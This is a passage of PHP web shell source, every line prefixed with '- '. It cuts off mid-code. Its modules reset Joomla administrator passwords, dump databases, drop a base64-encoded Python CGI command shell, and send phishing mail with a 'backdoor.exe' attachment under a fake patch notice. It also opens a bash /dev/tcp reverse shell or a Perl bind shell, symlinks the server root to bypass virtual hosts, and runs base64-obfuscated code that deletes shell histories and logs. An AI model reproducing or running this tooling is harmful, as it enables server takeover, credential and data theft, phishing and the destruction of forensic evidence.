- $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 64") or die(mysql_error());
- $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 65") or die(mysql_error());
- $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 65") or die(mysql_error());
- if ($SQL) {
- echo "<b class='wenk'>Success : New Password >>> - (123456)</b>";
- }else{ echo "<font color='red'>An Error Occures While Reseting Password!</font>";}
- }
- echo "</div></center>";
- } elseif ($_GET['do'] == 'dbdump') {
- echo $head . '<center><h1 class="titulo">DATABASE DUMP</h1><br><p align="center">';
- echo '<form action method=post>
- <table width=371 class=tabnet >
- <tr>
- <td>Server </td>
- <td><input class="inputz" type=text name=server value="localhost" size=52></td></tr><tr>
- <td>Username</td>
- <td><input class="inputz" type=text name=username size=52></td></tr><tr>
- <td>Password</td>
- <td><input class="inputz" type=text name=password size=52></td></tr><tr>
- <td>DataBase Name</td>
- <td><input class="inputz" type=text name=dbname size=52></td></tr>
- <tr>
- <td>DB Type </td>
- <td><form method=post action="' . $me . '">
- <select class="inputz" name=method>
- <option value="gzip">Gzip</option>
- <option value="sql">Sql</option>
- </select>
- <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
- </form></center></table>';
- if ($_POST['username'] && $_POST['dbname'] && $_POST['method']) {
- $date = date("Y-m-d");
- $dbserver = $_POST['server'];
- $dbuser = $_POST['username'];
- $dbpass = $_POST['password'];
- $dbname = $_POST['dbname'];
- $file = "Dump-$dbname-$date";
- $method = $_POST['method'];
- if ($method == 'sql') {
- $file = "Dump-$dbname-$date.sql";
- $fp = fopen($file, "w");
- } else {
- $file = "Dump-$dbname-$date.sql.gz";
- $fp = gzopen($file, "w");
- }
- function write($data) {
- global $fp;
- if ($_POST['method'] == 'ssql') {
- fwrite($fp, $data);
- } else {
- gzwrite($fp, $data);
- }
- }
- mysql_connect($dbserver, $dbuser, $dbpass);
- mysql_select_db($dbname);
- $tables = mysql_query("SHOW TABLES");
- while ($i = mysql_fetch_array($tables)) {
- $i = $i['Tables_in_' . $dbname];
- $create = mysql_fetch_array(mysql_query("SHOW CREATE TABLE " . $i));
- write($create['Create Table'] . ";nn");
- $sql = mysql_query("SELECT * FROM " . $i);
- if (mysql_num_rows($sql)) {
- while ($row = mysql_fetch_row($sql)) {
- foreach ($row as $j => $k) {
- $row[$j] = "'" . mysql_escape_string($k) . "'";
- }
- write("INSERT INTO $i VALUES(" . implode(",", $row) . ");n");
- }
- }
- }
- if ($method == 'ssql') {
- fclose($fp);
- } else {
- gzclose($fp);
- }
- header("Content-Disposition: attachment; filename=" . $file);
- header("Content-Type: application/download");
- header("Content-Length: " . filesize($file));
- flush();
- $fp = fopen($file, "r");
- while (!feof($fp)) {
- echo fread($fp, 65536);
- flush();
- }
- fclose($fp);
- }
- }elseif($_GET['do'] == 'hash'){
- $submit = $_POST['enter'];
- if (isset($_POST['password'])) {
- $pass = $_POST['password']; // password
- $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
- $hash = md5($pass); // md5 hash #1
- $md4 = hash("md4", $pass);
- $hash_md5 = md5($salt . $pass); // md5 hash with salt #2
- $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3
- $hash1 = sha1($pass); // sha1 hash #4
- $sha256 = hash("sha256", $text);
- $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5
- $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6
- }
- echo '<center><h1 class="titulo">PASSWORD HASH</h1><br><form action="" method="post"><b><table>';
- echo '<tr><td><b>Enter the word you want to encrypt:</b></td>';
- echo '<td><input class="inputz" type="text" name="password" size="40" />';
- echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
- echo '</td></tr><br>';
- echo '<tr><th colspan="2">Hash Result</th></center></tr>';
- echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value="' . $pass . '" readonly ></td></tr>';
- echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value="' . $hash . '" readonly></td></tr>';
- echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value="' . $md4 . '" readonly></td></tr>';
- echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value="' . $hash_md5 . '" readonly></td></tr>';
- echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value="' . $hash_md5_double . '" readonly></td></tr>';
- echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value="' . $hash1 . '" readonly ></td></tr>';
- echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value="' . $sha256 . '" readonly></td></tr>';
- echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value="' . $hash1_sha1 . '" readonly></td></tr>';
- echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value="' . $hash1_sha1_double . '" readonly></td></tr></table></center>';
- }elseif($_GET['do'] == "hashid"){
- if (isset($_POST['hash'])) {
- $hash = $_POST['hash'];
- if (strlen($hash) == 32) {
- $hashresult = "MD5 Hash";
- } elseif (strlen($hash) == 40) {
- $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
- } elseif (strlen($hash) == 13) {
- $hashresult = "DES(Unix) Hash";
- } elseif (strlen($hash) == 16) {
- $hashresult = "MySQL Hash / /DES(Oracle Hash)";
- } elseif (strlen($hash) == 41) {
- $GetHashChar = substr($hash, 40);
- if ($GetHashChar == "*") {
- $hashresult = "MySQL5 Hash";
- }
- } elseif (strlen($hash) == 64) {
- $hashresult = "SHA-256 Hash";
- } elseif (strlen($hash) == 96) {
- $hashresult = "SHA-384 Hash";
- } elseif (strlen($hash) == 128) {
- $hashresult = "SHA-512 Hash";
- } elseif (strlen($hash) == 34) {
- if (strstr($hash, '$1$')) {
- $hashresult = "MD5(Unix) Hash";
- }
- } elseif (strlen($hash) == 37) {
- if (strstr($hash, '$apr1$')) {
- $hashresult = "MD5(APR) Hash";
- }
- } elseif (strlen($hash) == 34) {
- if (strstr($hash, '$H$')) {
- $hashresult = "MD5(phpBB3) Hash";
- }
- } elseif (strlen($hash) == 34) {
- if (strstr($hash, '$P$')) {
- $hashresult = "MD5(Wordpress) Hash";
- }
- } elseif (strlen($hash) == 39) {
- if (strstr($hash, '$5$')) {
- $hashresult = "SHA-256(Unix) Hash";
- }
- } elseif (strlen($hash) == 39) {
- if (strstr($hash, '$6$')) {
- $hashresult = "SHA-512(Unix) Hash";
- }
- } elseif (strlen($hash) == 24) {
- if (strstr($hash, '==')) {
- $hashresult = "MD5(Base-64) Hash";
- }
- } else {
- $hashresult = "<font color='red'>Hash type not found</font>";
- }
- } else {
- $hashresult = "<font color='gold'>No Hash Entered</font>";
- }
- echo '
- <center><br><h1 class="titulo">HASH IDENTIFIER</h1><br>
- <form action="" method="POST">
- <tr>
- <table class="tabnet">
- <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size="60" class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
- <tr class="optionstr"><b><td>Result</td><td>:</td><td><font color="lime">'. $hashresult .'</font></td></tr></b>
- </table></tr></form>
- </center>';
- }elseif($_GET['do'] == 'python'){
- echo "<center/><br/><h1 class='titulo'>PYTHON BYPASS EXPLOIT</h1><br>";
- mkdir('spade_python', 0755);
- chdir('spade_python');
- $kokdosya = ".htaccess";
- $dosya_adi = "$kokdosya";
- $dosya = fopen($dosya_adi, 'w') or die("Not Writable!");
- $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .izo\nAddHandler cgi-script .izo\nAddHandler cgi-script .izo";
- fwrite($dosya, $metin);
- fclose($dosya);
- $pythonp = "IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB
- IHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD
- b3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg
- cmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv
- ciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg
- Y29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg
- Zm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv
- YXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g
- ZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5
- OgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y
- dCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz
- dHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy
- b20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs
- aW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt
- c2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw
- NCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg
- PSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F
- VEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl
- cwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi
- IlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g
- aXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs
- dWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu
- Zy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g
- d2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg
- aXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg
- ICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk
- XSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt
- W2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv
- cm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg
- PSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y
- IGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg
- ICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z
- aGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+
- CjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48
- ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl
- cnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs
- ICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg
- Q29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr
- IHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1
- dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5
- ZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n
- IFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj
- cmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6
- IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg
- ICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs
- YW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt
- KFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt
- aGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+
- PEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS
- PicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg
- ICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg
- ICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv
- dXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy
- aW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv
- biwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv
- bW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ
- TygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh
- bHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg
- ICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD
- SEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0
- ZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw
- cm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi";
- $file = fopen("python.izo", "w+");
- $write = fwrite($file, base64_decode($pythonp));
- fclose($file);
- chmod("python.izo", 0755);
- echo " <iframe src=spade_python/python.izo width=96% height=76% frameborder=0></iframe></center>
- </div>";
- }elseif($_GET['do'] == 'mail'){
- echo "<center><h1 class=titulo>MAILER</h1><br><table>
- <form method=post>
- <tr><td>Mail to:: </td><td><input type=email name='mailto' placeholder='your@email.com' ></td></tr>
- <tr><td>From :: </td><td><input type=email name='from' placeholder='spade@localhost.com' ></td></tr>
- <tr><td>Subject:: </td><td><input type=text name='subject' placeholder='Please!, Patch your System'></td></tr>
- <tr><td>Attach File:: </td><td><input type=text name='file' placeholder='".getcwd()."backdoor.exe'></td></tr>
- <tr><td>Count Mail:: </td><td><input type=text name='count' placeholder='1'></td></tr><br>
- Message::<br>
- <tr><textarea rows='6' cols='60' name='content'>Hi Admin!</textarea></tr><tr><td><input type=submit name='send' value='Send'></td></tr>
- </table>";
- if(isset($_POST['mailto']) && (isset($_POST['send']))){
- $mailto = $_POST['mailto'];
- $from = $_POST['from'];
- $subject = $_POST['subject'];
- $file = $_POST['file'];
- $count = (int)$_POST['count'];
- $mail_content = $_POST['content'];
- if(filter_var($mailto, FILTER_VALIDATE_EMAIL)){
- if(!empty($file)&&@is_file($file)){
- $filez = $file;
- $content = readfile($filez);
- $content = chunk_split(__ZW5jb2Rlcg($content));
- $uid = md5(uniqid(time()));
- $filename = basename($filez);
- $headers = "From: ".$from." <".$from.">\r\n";
- $headers .= "To: " . $mailto. " ( ".$mailto." ) \r\n";
- $headers .= "Reply-To: ".$from."\r\n";
- $headers .= "Content-Type: multipart/mixed;
- boundary=\"".$uid."\"\r\n\r\n";
- $headers .= 'MIME-Version: 1.0' . "\r\n";
- $headers .= 'X-Mailer: php' . "\r\n";
- $mail_content = "--".$uid."\r\n";
- $mail_content .= "Content-type:text/plain;
- charset=iso-8859-1\r\n";
- $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
- $mail_content .= $mail_content."\r\n\r\n";
- $mail_content .= "--".$uid."\r\n";
- $mail_content .= "Content-Type: application/octet-stream;
- name=\"".$filename."\"\r\n";
- $mail_content .= "Content-Transfer-Encoding: base64\r\n";
- $mail_content .= "Content-Disposition: attachment;
- filename=\"".$filename."\"\r\n\r\n";
- $mail_content .= $content."\r\n\r\n";
- $mail_content .= "--".$uid."--";
- }else{
- $headers = "From: " . $from. " ( ".$from." ) \r\n";
- $headers .= "To: " . $mailto. " ( ".$mailto." ) \r\n";
- $headers .= 'Reply-To: '.$from.'' . "\r\n";
- $headers .= 'Content-type: text/html;
- charset=utf-8' . "\r\n";
- $headers .= 'MIME-Version: 1.0' . "\r\n";
- $headers .= 'X-Mailer: php' . "\r\n";
- }
- if(empty($count)||$count<1)$count=1;
- if(!empty($from)){
- for($i=1;$i<=$count;$i++){
- if(@mail($mailto,$subject,$mail_content,$headers))echo("<font color=lime>Sent to :: ".$mailto."</font><br>");
- }
- }else{ echo "<font color=red>Invalid \"From\" Email!</font>"; }
- }else{ echo "<font color=red>Invalid Email!</font>"; }
- }
- echo "</center>";
- } elseif($_GET['do'] == 'network') {
- echo "<center>
- <h1 class='titulo'>BACK CONNECT</h1><br><form method='post'>
- <u>Bind Port:</u> <br>
- PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
- <input type='submit' name='sub_bp' value='>>'>
- </form>
- <form method='post'>
- <u>Back Connect:</u> <br>
- Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>
- PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
- <input type='submit' name='sub_bc' value='>>'>
- </form></center>";
- if(isset($_POST['sub_bc'])) {
- $ip = $_POST['ip_bc'];
- $port = $_POST['port_bc'];
- exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
- }
- $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
- if(isset($_POST['sub_bp'])) {
- $f_bp = fopen("/tmp/bp.pl", "w");
- fwrite($f_bp, base64_decode($bind_port_p));
- fclose($f_bp);
- $port = $_POST['port_bind'];
- $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
- sleep(1);
- echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
- unlink("/tmp/bp.pl");
- }
- }elseif ($_GET['do'] == 'vhost') {
- echo "<center><h1 class='titulo'>BYPASS VHOST</h1></center>";
- echo "<form method='POST' action=''>";
- echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
- if (isset($_POST['Colii'])) {
- system('ln -s / Spade.txt');
- $fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzCkRpcmVjdG9yeUluZGV4IHNwYWRlLmh0bQpBZGRUeXBlIHR4dCAucGhwCkFkZEhhbmRsZXIgdHh0IC5waHA=';
- $file = fopen(".htaccess", "w+");
- $write = fwrite($file, base64_decode($fvckem));
- $Bok3p = symlink("/", "Spade.txt");
- $rt = "<br><a href=Spade.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>Bypassed Successfully</b></font></a>";
- echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";
- }
- echo "</form>";
- }elseif($_GET['do'] == 'clear_logs'){
- echo "<center> <h1 class='titulo'>LOG CLEANER</h1><br>";
- eval(base64_decode("aWYoc3RydG9sb3dlcihzdWJzdHIoUEhQX09TLCAwLCAzKSkgPT09ICd3aW4nKSB7IGVjaG8gIjxmb250IGNvbG9yPXJlZD5UaGlzIEZlYXR1cmUgaXMgZm9yIExpbnV4IFNlcnZlciBPbmx5ITwvZm9udD4iOyB9ZWxzZXsKCQkJZWNobyAiWypdIEcwaW5nIHRvIERlbGV0ZSBMMGcgU2VydmVyczp2IC4gLiAuPGJyPiI7CgkJCQlzbGVlcCgyKTsKCQkJJHJtID0gZXhlKCJmaW5kIC8gLW5hbWUgKi5iYXNoX2hpc3RvcnkgLWV4ZWMgcm0gLXJmIHt9IFw7Iik7CgkJCWlmKCEkcm0pe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm0xID0gZXhlKCJmaW5kIC8gLW5hbWUgKi5iYXNoX2xvZ291dCAtZXhlYyBybSAtcmYge30gXDsiKTsKCQkJaWYoISRybTEpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm0yID0gZXhlKCdmaW5kIC8gLW5hbWUgImxvZyoiIC1leGVjIHJtIC1yZiB7fSBcOycpOwoJCQlpZighJHJtMil7ZWNobyAiPGZvbnQgY29sb3I9cmVkPlVuYWJsZSB0byBEZWxldGUgdGhpcyBMb2chPC9mb250Pjxicj4iO31lbHNleyBlY2hvICI8Zm9udCBjb2xvcj1saW1lPkxvZyBDbGVhciE8L2ZvbnQ+PGJyPiI7fQoJCQkJc2xlZXAoMik7CgkJCSRybTMgPSBleGUoImZpbmQgLyAtbmFtZSAqLmxvZyAtZXhlYyBybSAtcmYge30gXDsiKTsKCQkJaWYoISRybTMpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm00ID0gZXhlKCJybSAtcmYgL3RtcC9sb2dzIik7CgkJCWlmKCEkcm00KXtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+VW5hYmxlIHRvIERlbGV0ZSB0aGlzIExvZyE8L2ZvbnQ+PGJyPiI7fWVsc2V7IGVjaG8gIjxmb250IGNvbG9yPWxpbWU+TG9nIENsZWFyITwvZm9udD48YnI+Ijt9CgkJCQlzbGVlcCgyKTsKCQkJJHJtNSA9IGV4ZSgicm0gLXJmIC9yb290Ly5iYXNoX2xvZ291dCIpOwoJCQlpZighJHJtNSl7ZWNobyAiPGZvbnQgY29sb3I9cmVkPlVuYWJsZSB0byBEZWxldGUgdGhpcyBMb2chPC9mb250Pjxicj4iO31lbHNleyBlY2hvICI8Zm9udCBjb2xvcj1saW1lPkxvZyBDbGVhciE8L2ZvbnQ+PGJyPiI7fQoJCQkJc2xlZXAoMik7CgkJCSRybTYgPSBleGUoInJtIC1yZiAkSElTVEZJTEUiKTsKCQkJaWYoISRybTYpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm03ID0gZXhlKCJybSAtcmYgL3Jvb3QvLmtzaF9oaXN0b3J5Iik7CgkJCWlmKCEkcm03KXtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+VW5hYmxlIHRvIERlbGV0ZSB0aGlzIExvZyE8L2ZvbnQ+PGJyPiI7fWVsc2V7IGVjaG8gIjxmb250IGNvbG9yPWxpbWU+TG9nIENsZWFyITwvZm9udD48YnI+Ijt9CgkJCQlzbGVlcCgyKTsKCQkJJHJtOCA9IGV4ZSgicm0gLXJmIC91c3IvbG9jYWwvYXBhY2hlL2xvZ3MiKTsKCQkJaWYoISRybTgpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm05ID0gZXhlKCJybSAtcmYgL3Jvb3QvLmJhc2hfaGlzdG9yeSIpOwoJCQlpZighJHJtOSl7ZWNobyAiPGZvbnQgY29sb3I9cmVkPlVuYWJsZSB0byBEZWxldGUgdGhpcyBMb2chPC9mb250Pjxicj4iO31lbHNleyBlY2hvICI8Zm9udCBjb2xvcj1saW1lPkxvZyBDbGVhciE8L2ZvbnQ+PGJyPiI7fQoJCQkJc2xlZXAoMik7CgkJCSRybTEwID0gZXhlKCJybSAtcmYgL3Vzci9sb